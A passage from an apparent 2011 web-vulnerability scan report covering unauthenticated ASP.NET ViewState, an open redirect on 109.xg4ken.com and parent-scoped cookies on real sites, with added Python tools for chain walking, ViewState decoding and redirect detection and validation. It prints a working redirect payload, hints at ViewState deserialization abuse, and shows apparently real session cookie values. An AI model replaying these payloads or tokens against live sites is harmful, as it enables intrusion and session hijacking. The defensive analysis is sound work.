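Added example (not part of the scanner output, and not XSS.CX's or Burp's code): the section 11 listings give subject, issuer and validity for every certificate the server sent, which is enough to reproduce the name-and-validity part of a chain walk by hand. The Python below takes the 11.5 store.tenable.com listing as constructed input (strings copied from the report) together with the report header timestamp, orders the certificates by following issuer names from the leaf, and reports duplicates (as in the two identical Entrust entries under 11.1), cross-signed subjects (as under 11.8), missing issuers, and certificates outside their validity period at scan time. It matches names only: it verifies no signatures and has no trust store, so it cannot decide whether the self-signed root it reaches is one a browser trusts.

```python
import re
from datetime import datetime

# Constructed input: the certificates listed under 11.5 (https://store.tenable.com/)
# as (subject, issuer, valid_from, valid_to), in the order the server presented them.
STORE_TENABLE_CERTS = [
    ("*.tenable.com", "DigiCert High Assurance CA-3",
     "Thu May 20 19:00:00 CDT 2010", "Tue May 28 18:59:59 CDT 2013"),
    ("DigiCert High Assurance CA-3", "DigiCert High Assurance EV Root CA",
     "Mon Apr 02 19:00:00 CDT 2007", "Sat Apr 02 19:00:00 CDT 2022"),
    ("DigiCert High Assurance EV Root CA", "Entrust.net Secure Server Certification Authority",
     "Sun Oct 01 00:00:00 CDT 2006", "Sat Jul 26 13:15:15 CDT 2014"),
    ("Entrust.net Secure Server Certification Authority",
     "Entrust.net Secure Server Certification Authority",
     "Tue May 25 11:09:40 CDT 1999", "Sat May 25 11:39:40 CDT 2019"),
]

REPORT_TIME = "Tue Apr 26 09:34:48 CDT 2011"  # timestamp from the report header


def parse_report_time(text):
    """Parse the report's 'Tue May 25 11:09:40 CDT 1999' timestamps.

    The zone abbreviation is dropped before parsing: all timestamps in the report
    are printed in the scanner's local zone, so the naive datetimes compare
    correctly with each other (they are not UTC instants)."""
    text = re.sub(r"\s+[A-Z]{3,4}\s+(?=\d{4}$)", " ", text)
    return datetime.strptime(text, "%a %b %d %H:%M:%S %Y")


def build_chain(certs, leaf_subject, at):
    """Order presented certificates by following issuer names from the leaf.

    Returns (chain, problems): chain is the list of (subject, issuer, valid_from,
    valid_to) tuples from the leaf to a self-signed root, problems is a list of
    strings. This matches names only: it checks no signatures or key identifiers
    and has no trust store, so it cannot say whether the root is trusted."""
    chain, problems, visited = [], [], set()
    subject = leaf_subject
    while subject not in visited:
        visited.add(subject)
        candidates = [c for c in certs if c[0] == subject]
        if not candidates:
            problems.append(f"issuer {subject!r} was not presented; chain is incomplete")
            break
        distinct = set(candidates)
        if len(candidates) > len(distinct):
            problems.append(f"{subject!r} was presented more than once")
        if len(distinct) > 1:
            problems.append(f"{subject!r} was presented with {len(distinct)} different "
                            f"issuers (cross-signed); following the first one")
        cert = candidates[0]
        chain.append(cert)
        if not parse_report_time(cert[2]) <= at <= parse_report_time(cert[3]):
            problems.append(f"{subject!r} is not valid at {at:%Y-%m-%d %H:%M:%S}")
        if cert[0] == cert[1]:  # self-signed: the walk ends at a root
            break
        subject = cert[1]
    else:
        problems.append(f"issuer loop detected at {subject!r}")
    return chain, problems


def chain_summary(certs, leaf_subject, at_text=REPORT_TIME):
    """Return (ordered subject names, problems) for a listing at the given time."""
    chain, problems = build_chain(certs, leaf_subject, parse_report_time(at_text))
    return [c[0] for c in chain], problems


if __name__ == "__main__":
    subjects, problems = chain_summary(STORE_TENABLE_CERTS, "*.tenable.com")
    print(" -> ".join(subjects))
    print(problems or "no name/validity problems at report time")
```

Run against the 11.5 listing at the report time the walk is clean: leaf, DigiCert CA-3, the DigiCert EV root as cross-signed by Entrust, then the self-signed Entrust root. Whether that 1999 Entrust root (or the DigiCert root itself, which most 2011 trust stores carried directly) is trusted depends on the client's store, which is why the scanner's own verdict, not this walk, decides the severity.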

12. ASP.NET ViewState without MAC enabled  previous  next
There are 3 instances of this issue:


12.1. http://www.merrilledge.com/m/pages/global-oao.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Request

GET /m/pages/global-oao.aspx HTTP/1.1
Host: www.merrilledge.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=0W34VN9dA9bWGxNH7Zo+wNB4BqhgfwgC/V3SS6QoRVIhpR3iFFqiPEtEy5Vg60B4eA74F0BCLpV6OvE72yrh6+55CW/ai7RnuZGDEpHwvqDe8sRPkCBbEb0l/YGIxk6PrZhVLIoYebn0XY3xMclg+G08+dUO8bhtR0OiIYjoM0++rS7ZOJ/UaaFpw0KtXh6K+2AU8+inyYPyOlBsNy2LbHjpwP50nhqcqqBAIUQ/OhxApBnqmCLnCTSes9vjk4hHDVrhjbXDoPLoISGQqisUzc6TBefD5Q9m4GnifxAiXCyr2xfWKeoDmM//AH+0MV7lybo5N/sihQV4ohsXxYN1J8PCK7RVgHPvhsxGkbmcXf/fRxt0k0zaGW7H8xTY7bFLulvcm1wXA8II0K3qcgsXox5uljKP60/lrQ/iD+Y+VOJAN4phstGAi5uH1rku+/Jz4DeUUSYO3fBMcYMUCguwWF6Tpm5rWb9ogQfkSWUlXd1PKvu/YtQcdoj/0yQueC7l6fbkCSjrjU+TBskdUgQaLWGR6v9BYYwx6I+r6kEdusGSd0Toh8QeOVM8QmpAfl/vpcow5jjnqSi4WCWrtMkZOqeiDWBEhbMZ5EVgOoJJiV0xNFM9qwN4bJ8PgOrbFotT; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:28:12 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89473


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTYzNTQzMDQ3NWRk" />
...[SNIP]...

12.2. https://www.merrilledge.com/m/pages/global-oao.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/global-oao.aspx

Request

GET /m/pages/global-oao.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: SMIDENTITY=...[SNIP]...; pxs=53e1d1d2ef5543dabbbb6e0d12a34f8b; pxv=C22A32BD-4241-4EE4-951A-6B07D6D8E16E

Response

HTTP/1.1 301 Moved Permanently
Date: Tue, 26 Apr 2011 12:28:10 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
X-AspNet-Version: 2.0.50727
Location: http://www.merrilledge.com/m/pages/global-oao.aspx
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 89478


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTYzNTQzMDQ3NWRk" />
...[SNIP]...

12.3. https://www.merrilledge.com/m/pages/home.aspx  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   https://www.merrilledge.com
Path:   /m/pages/home.aspx

Request

GET /m/pages/home.aspx HTTP/1.1
Host: www.merrilledge.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 12:27:04 GMT
Server: Microsoft-IIS/6.0
X-Powered-By: ASP.NET
set-cookie: SMIDENTITY=jLP3XoAxGsv1v6MwPZhahlP/aoO3xH/srhMcrJj795J+eDNFXiPfjzck1kD4CBi+6ie4KrwamlTHaXTZUdECRzrFky9gNvwqK2gfsTdEDm7sAur5XVP4PPYin3ZpmEGZhp4U9tI/R2PBhf10C0GUszchafmuD9bl4ok1Tou4xpWvp8+gJofMVxln5UHKDCa81PkeNNVr9tnGgUbb8xfUqJ9mQ+4UmQUBAvTOqlILImkN5L5gXWD34cRgwFSZ2KnJ3H2WELiFxhYRFU/W8/5hb7Ab0vdhSiKgU1mzlw6G++AaFuJs+7z65oKRdeBCqK0hIz3tim19s96RERtkf9rfjHj+6RDI79fjrabVGOlnraDPyBxJbqaBTLfWCRw+ylCtGUKvwL6+os3qLez4GsDok2Qd+n4qvsQdjjUilaWTMSP27nak6lbRwCk4b/M4No0d4wzcrSvMyENoATzMp8aftIfSjmRgRvGUNASAKrTSpR5rfw6e36o6v3gAJa9Ivvp8bVC7cNorr2VzTikkqJI1i1lWvbV9SNzGVXk61fudxdZpjJjPAMIp9cah6rKP6ckESa6k8l1TR7oiXNRlH9EEi7eiYAWvwxgHlp0pcxiP0RMD9/1rRGHkXk3lzz8V7861; path=/; domain=.merrilledge.com
X-AspNet-Version: 2.0.50727
Set-Cookie: pxs=341ce30bc7594740a1c8d88f714e0605; domain=.merrilledge.com; path=/
Cache-Control: private
Content-Type: text/html; charset=utf-8
Content-Length: 107200


<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>    
       <!-- start content
...[SNIP]...
<input type="hidden" name="__VIEWSTATE" id="__VIEWSTATE" value="/wEPDwUKLTU5ODkwMTk0M2Rk" />
...[SNIP]...
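Added example (not part of this report, and not ASP.NET's or the scanner's code): the three instances above share one shape, a tiny __VIEWSTATE value and no MAC. The Python below decodes the ObjectStateFormatter binary format that ASP.NET 2.0 uses for ViewState (the "/wEPD" prefix is the 0xFF 0x01 format header) far enough to find the end of the serialized object graph, and treats whatever bytes remain as the digest that enableViewStateMac appends. The two captured values are used as constructed input. append_trailer is a demonstration helper that pads a blob with zeros so the check sees a MAC-sized trailer; it computes no real HMAC.

```python
import base64

# Token values of the ASP.NET 2.0 ObjectStateFormatter binary format. Only the
# tokens needed for ordinary page ViewState are handled; anything else raises.
TOKEN_INT16, TOKEN_INT32, TOKEN_BYTE, TOKEN_STRING = 0x01, 0x02, 0x03, 0x05
TOKEN_PAIR, TOKEN_TRIPLET, TOKEN_ARRAYLIST = 0x0F, 0x10, 0x16
TOKEN_NULL, TOKEN_EMPTY_STRING, TOKEN_ZERO = 0x64, 0x65, 0x66
TOKEN_TRUE, TOKEN_FALSE = 0x67, 0x68
FORMAT_HEADER = b"\xff\x01"  # marker + version; base64 "/wE..." is this prefix

# Digest lengths ASP.NET appends to the serialized bytes when enableViewStateMac
# is on, keyed by validation algorithm.
MAC_LENGTHS = {16: "MD5", 20: "SHA1", 32: "HMACSHA256", 48: "HMACSHA384", 64: "HMACSHA512"}

# Constructed input: the two __VIEWSTATE values captured in 12.1/12.2 and 12.3 above.
VIEWSTATE_GLOBAL_OAO = "/wEPDwUKLTYzNTQzMDQ3NWRk"
VIEWSTATE_HOME = "/wEPDwUKLTU5ODkwMTk0M2Rk"


def _read_7bit_int(raw, pos):
    """Decode the 7-bits-per-byte varint used for lengths and Int32 values."""
    value, shift = 0, 0
    while True:
        b = raw[pos]
        pos += 1
        value |= (b & 0x7F) << shift
        if not b & 0x80:
            return value, pos
        shift += 7


def _read_object(raw, pos):
    """Decode one serialized object at raw[pos]; return (object, next position)."""
    tok = raw[pos]
    pos += 1
    simple = {TOKEN_NULL: None, TOKEN_EMPTY_STRING: "", TOKEN_ZERO: 0,
              TOKEN_TRUE: True, TOKEN_FALSE: False}
    if tok in simple:
        return simple[tok], pos
    if tok == TOKEN_INT32:
        return _read_7bit_int(raw, pos)
    if tok == TOKEN_INT16:
        return int.from_bytes(raw[pos:pos + 2], "little", signed=True), pos + 2
    if tok == TOKEN_BYTE:
        return raw[pos], pos + 1
    if tok == TOKEN_STRING:
        n, pos = _read_7bit_int(raw, pos)
        return raw[pos:pos + n].decode("utf-8"), pos + n
    if tok in (TOKEN_PAIR, TOKEN_TRIPLET):
        items = []
        for _ in range(2 if tok == TOKEN_PAIR else 3):
            item, pos = _read_object(raw, pos)
            items.append(item)
        return ("Pair" if tok == TOKEN_PAIR else "Triplet", *items), pos
    if tok == TOKEN_ARRAYLIST:
        n, pos = _read_7bit_int(raw, pos)
        items = []
        for _ in range(n):
            item, pos = _read_object(raw, pos)
            items.append(item)
        return items, pos
    raise ValueError(f"unsupported token 0x{tok:02x} at offset {pos - 1}")


def analyse_viewstate(b64):
    """Decode a __VIEWSTATE value and report whether a MAC trailer follows the data.

    Returns a dict: the decoded object graph, the number of bytes left after it,
    and the MAC algorithm that trailer length implies (None when there is none)."""
    raw = base64.b64decode(b64)
    if not raw.startswith(FORMAT_HEADER):
        # Encrypted ViewState (or another formatter) does not start with 0xFF 0x01;
        # the trailer check below would be meaningless on it.
        return {"format": "not ObjectStateFormatter", "object": None,
                "trailer_bytes": len(raw), "mac": None}
    obj, end = _read_object(raw, len(FORMAT_HEADER))
    trailer = len(raw) - end
    return {"format": "ObjectStateFormatter", "object": obj,
            "trailer_bytes": trailer, "mac": MAC_LENGTHS.get(trailer) if trailer else None}


def mac_enabled(b64):
    """True when the value carries a trailer of a known digest length."""
    return analyse_viewstate(b64)["mac"] is not None


def append_trailer(b64, nbytes):
    """Constructed for demonstration only: pad a blob with nbytes of zeros so it
    has the length profile of a MAC-bearing value. A real trailer is an HMAC over
    the serialized bytes under the machineKey validationKey, not zeros."""
    return base64.b64encode(base64.b64decode(b64) + b"\x00" * nbytes).decode()


if __name__ == "__main__":
    for vs in (VIEWSTATE_GLOBAL_OAO, VIEWSTATE_HOME, append_trailer(VIEWSTATE_HOME, 20)):
        print(vs, analyse_viewstate(vs))
```

Both captured values decode to Pair(Pair("-635430475", null), null) and Pair(Pair("-598901943", null), null) with zero bytes left over, which is the finding expressed in bytes: nothing authenticates the blob, so a client can post back any graph the formatter will deserialize, including BinaryFormatter-serialized objects (token 0x32), which makes this more than an integrity issue. The fix is server-side, `<pages enableViewStateMac="true" />` in web.config with no per-page `EnableViewStateMac="false"` overrides; Microsoft later changed ASP.NET to ignore the "false" setting altogether.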

13. Open redirection  previous  next

Summary

Severity:   Low
Confidence:   Certain
Host:   http://109.xg4ken.com
Path:   /media/redir.php

Issue detail

The value of the url[] request parameter is used to perform an HTTP redirect. The payload http%3a//afa5caf6e671e492f/a%3fhttp%3a//servedby.flashtalking.com/click/16008%3b128708%3b94221%3b230%3b3/%3furl%3dhttp%3a//response.firstdata.com/%3felqPURLPage%3d15 was submitted in the url[] parameter. This caused a redirection to the following URL:

http://afa5caf6e671e492f/a?http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15

Request

GET /media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search&url[]=http%3a//afa5caf6e671e492f/a%3fhttp%3a//servedby.flashtalking.com/click/16008%3b128708%3b94221%3b230%3b3/%3furl%3dhttp%3a//response.firstdata.com/%3felqPURLPage%3d15 HTTP/1.1
Host: 109.xg4ken.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 302 Found
Date: Mon, 25 Apr 2011 23:44:08 GMT
Server: Apache/2.0.52 (Red Hat)
X-Powered-By: PHP/4.3.9
Set-Cookie: kenshoo_id=5a9eb212-05ba-a349-c2e9-00005b81cb95; expires=Sun, 24-Jul-2011 23:44:08 GMT; path=/; domain=.xg4ken.com
Location: http://afa5caf6e671e492f/a?http://servedby.flashtalking.com/click/16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15
P3P: policyref="http://www.xg4ken.com/w3c/p3p.xml", CP="ADMa DEVa OUR IND DSP NON LAW"
Content-Length: 0
Connection: close
Content-Type: text/html; charset=UTF-8

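Added example (not part of this report or of the xg4ken.com redirector): the check in section 13 is two steps, put a host the tester controls into a parameter and see whether the Location header lands on that host. The Python below uses the captured request target and Location header as constructed input. find_open_redirect reproduces the detection over those two strings, and safe_redirect_target is one way redir.php could validate the url[] value instead of passing it through: only local paths or absolute http(s) URLs whose hostname is exactly on an allow-list are returned. The allow-list contents (response.firstdata.com, servedby.flashtalking.com) are assumed for illustration from the hosts in the captured payload.

```python
from urllib.parse import parse_qs, urlsplit

# Constructed input: the request target and Location header captured in section 13.
ISSUING_HOST = "109.xg4ken.com"
REQUEST_TARGET = (
    "/media/redir.php?prof=56&camp=3086&affcode=kw134&cid=10327990298&networkType=search"
    "&url[]=http%3a//afa5caf6e671e492f/a%3fhttp%3a//servedby.flashtalking.com/click/"
    "16008%3b128708%3b94221%3b230%3b3/%3furl%3dhttp%3a//response.firstdata.com/%3felqPURLPage%3d15"
)
LOCATION_HEADER = (
    "http://afa5caf6e671e492f/a?http://servedby.flashtalking.com/click/"
    "16008;128708;94221;230;3/?url=http://response.firstdata.com/?elqPURLPage=15"
)

# Assumed allow-list for the hardened version; the real redirector's list is not known.
ALLOWED_REDIRECT_HOSTS = {"response.firstdata.com", "servedby.flashtalking.com"}


def find_open_redirect(request_target, location, issuing_host):
    """Detection side: names of query parameters whose value carries the host that
    the Location header ended up on, when that host is not the issuing host."""
    loc_host = urlsplit(location).hostname
    if loc_host is None or loc_host == issuing_host.lower():
        return []
    hits = []
    for name, values in parse_qs(urlsplit(request_target).query).items():
        if any(urlsplit(v).hostname == loc_host for v in values):
            hits.append(name)
    return hits


def safe_redirect_target(value, allowed_hosts):
    """Hardening side: return value if it is an acceptable redirect target, else None.

    Accepted: a local absolute path ('/x' but not '//x'), or an http(s) URL whose
    hostname is exactly on the allow-list. Rejected: other schemes, scheme-relative
    URLs, backslashes and control characters (browsers normalise '\\' to '/'), and
    userinfo, so that 'http://allowed.example@evil.example/' cannot pass."""
    if not value or any(c in value for c in "\\\r\n\t\x00"):
        return None
    parts = urlsplit(value)
    if parts.scheme == "" and parts.netloc == "":
        return value if value.startswith("/") and not value.startswith("//") else None
    if parts.scheme not in ("http", "https"):
        return None
    if parts.username is not None or parts.password is not None:
        return None
    host = (parts.hostname or "").lower()
    return value if host in {h.lower() for h in allowed_hosts} else None


if __name__ == "__main__":
    print("tainted parameters:", find_open_redirect(REQUEST_TARGET, LOCATION_HEADER, ISSUING_HOST))
    submitted = parse_qs(urlsplit(REQUEST_TARGET).query)["url[]"][0]
    print("submitted url[] accepted:", safe_redirect_target(submitted, ALLOWED_REDIRECT_HOSTS) is not None)
```

Matching the hostname exactly rather than with a substring or prefix test is the point: the captured payload carries http://response.firstdata.com inside its query string, so a check of the form "contains firstdata.com" would have accepted it and the redirect would still land on afa5caf6e671e492f.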

14. Cookie scoped to parent domain  previous  next
There are 76 instances of this issue:


14.1. http://assets.trialpay.com/tr/  previous  next

Summary

Severity:   Low
Confidence:   Firm
Host:   http://assets.trialpay.com
Path:   /tr/

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain:

The highlighted cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /tr/?u=%2Fabout%2Fpress-releases%2F%3Fyear%3D2007 HTTP/1.1
Accept: */*
Accept-Language: en-US
Accept-Encoding: gzip, deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; WOW64; Trident/5.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729; .NET4.0C; .NET4.0E)
Proxy-Connection: Keep-Alive
Host: assets.trialpay.com

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 14:25:25 GMT
Server: Apache
Set-Cookie: tpsess=fvvvvvulqmr4r26j1pkontns7l3001c880969669; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
P3P: CP="IDC DSP COR CURa ADMa OUR IND PHY ONL COM STA"
Set-Cookie: si=Iitt8Ait; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
Set-Cookie: sk=7fef1580a3c331af; expires=Sun, 24-Apr-2016 14:25:25 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ui=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ui=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_uk=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_uk=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_ul=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_ul=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Set-Cookie: u_sr=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=.trialpay.com
Set-Cookie: u_sr=deleted; expires=Mon, 26-Apr-2010 14:25:24 GMT; path=/; domain=merchant.trialpay.com
Content-Type: text/html
Content-Length: 0


14.2. http://shots.snap.com/rk.php

Summary

Severity:   Low
Confidence:   Firm
Host:   http://shots.snap.com
Path:   /rk.php

Issue detail

The following cookies were issued by the application and are scoped to a parent of the issuing domain. The highlighted cookies appear to contain session tokens, which may increase the risk associated with this issue. You should review the contents of the cookies to determine their function.

Request

GET /rk.php?url=http%3A%2F%2Fwww.mcafee.com%2Fus%2Fresources%2Fsolution-briefs%2Fsb-lizamoon-sql-injection.pdf&key=6e8afd4f63cdc7886a3f718aa78c7375&lang=en-us&th=silver&src=www.slaviks-blog.com&cp=Shotsense&s=small&svc=&tag=&atext=posted&title=Musings%20on%20Database%20Security&dfs=10&call=0&uid=16266132404ce087181f51bbd2d1a9b9&vid=89fdd0457a773fb9e78a2ee3e0b8ebd3&fl=null&size=320x79 HTTP/1.1
Host: shots.snap.com
Proxy-Connection: keep-alive
Referer: http://www.slaviks-blog.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots

Response

HTTP/1.1 200 OK
Date: Tue, 26 Apr 2011 01:22:46 GMT
Server: Apache/2.2.14 (Unix) DAV/2 mod_ssl/2.2.14 OpenSSL/1.0.0 PHP/5.2.17
X-Powered-By: PHP/5.2.17
Expires: Mon, 26 Jul 1997 05:00:00 GMT
Last-Modified: Tue, 26 Apr 2011 01:22:46 GMT
Cache-Control: no-store, no-cache, must-revalidate
Cache-Control: post-check=0, pre-check=0
Pragma: no-cache
P3P: CP="NOI DSP COR CURa PSDa OUR NOR NAV STA"
Set-Cookie: user=id%3D16266132404ce087181f51bbd2d1a9b9%26exp%3D1366766106%26v%3D2%26origin%3Dshots%26call%3D1%26time%3D1303780966; expires=Wed, 24-Apr-2013 01:22:46 GMT; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F; path=/; domain=.snap.com
Set-Cookie: session=id%3Dcc29bbb979ecb0e0384fa2c504658e7f%26time%3D1303780966%26created_time%3D1303780966%26destination_url%3Dhttp%253A%252F%252Fshots.snap.com%252Frk.php%253Furl%253Dhttp%25253A%25252F%25252Fwww.mcafee.com%25252Fus%25252Fresources%25252Fsolution-briefs%25252Fsb-lizamoon-sql-injection.pdf%2526key%253D6e8afd4f63cdc7886a3f718aa78c7375%2526lang%253Den-us%2526th%253Dsilver%2526src%253Dwww.slaviks-blog.com%2526cp%253DShotsense%2526s%253Dsmall%2526svc%253D%2526tag%253D%2526atext%253Dposted%2526title%253DMusings%252520on%252520Database%252520Security%2526dfs%253D10%2526call%253D0%2526uid%253D16266132404ce087181f51bbd2d1a9b9%2526vid%253D89fdd0457a773fb9e78a2ee3e0b8ebd3%2526fl%253Dnull%2526size%253D320x79%26referrer%3Dhttp%253A%252F%252Fwww.slaviks-blog.com%252F%26call%3D1; path=/; domain=.snap.com
Set-Cookie: spa=deleted; expires=Mon, 26-Apr-2010 01:22:45 GMT; path=/; domain=.snap.com
Vary: Accept-Encoding,User-Agent
Content-Type: text/html; charset=UTF-8
Content-Length: 10269

<html>
<head>


<style>


body {
margin: 0;
padding: 0;
background: #f2f2f2 url('http://i.ixnp.com/images/hdr-spons.gif') no-repeat fixed 97% 94%;

border: 0;
}

#keywordTable {
fon
...[SNIP]...

14.3. http://www.clone-systems.com/ecommerce/categories/PCI-ASV-Scanning-Services/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/PCI-ASV-Scanning-Services/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/PCI-ASV-Scanning-Services/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CMSSESSIDe4d04fcf=rqtsjtdic4ntsneeiknvckvj63

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 23:55:48 GMT
Server: Apache
Set-Cookie: SHOP_SESSION_TOKEN=at9kctjodfv3r3iam6cs56aqf7; expires=Tue, 26-Apr-2011 23:55:48 GMT; path=/ecommerce/; domain=.clone-systems.com
Expires: Thu, 19 Nov 1981 08:52:00 GMT
Cache-Control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0
Pragma: no-cache
Vary: Accept-Encoding
Content-Type: text/html; charset=UTF-8
Content-Length: 24887

<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd">
<html xml:lang="en" lang="en" xmlns="http://www.w3.org/1999/xhtml">
<head>
   


...[SNIP]...

14.4. http://www.clone-systems.com/ecommerce/categories/Penetration-Testing/

Summary

Severity:   Low
Confidence:   Firm
Host:   http://www.clone-systems.com
Path:   /ecommerce/categories/Penetration-Testing/

Issue detail

The following cookie was issued by the application and is scoped to a parent of the issuing domain. The cookie appears to contain a session token, which may increase the risk associated with this issue. You should review the contents of the cookie to determine its function.

Request

GET /ecommerce/categories/Penetration-Testing/ HTTP/1.1
Host: www.clone-systems.com
Proxy-Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
